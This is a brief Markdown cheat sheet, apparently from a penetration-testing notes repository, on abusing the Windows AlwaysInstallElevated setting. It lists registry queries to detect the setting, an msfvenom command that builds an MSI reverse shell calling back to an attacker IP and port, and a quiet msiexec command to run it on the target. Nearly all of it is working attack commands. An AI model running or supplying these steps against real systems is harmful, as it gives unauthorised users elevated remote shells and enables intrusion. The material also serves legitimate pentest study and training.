18 lines
516 B
Markdown
18 lines
516 B
Markdown
# AlwaysInstalledElevated
|
|
|
|
* Watch out for `AlwaysInstalledElevated` keys inside the registry via
|
|
```sh
|
|
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
|
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
|
```
|
|
* Prepare reverse shell on attacker as an msi file
|
|
```
|
|
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker-IP> LPORT=<attacker-Port> -f msi -o shell.msi
|
|
```
|
|
* start the msi on target
|
|
```sh
|
|
msiexec /quiet /qn /i C:\shell.msi
|
|
```
|
|
|
|
|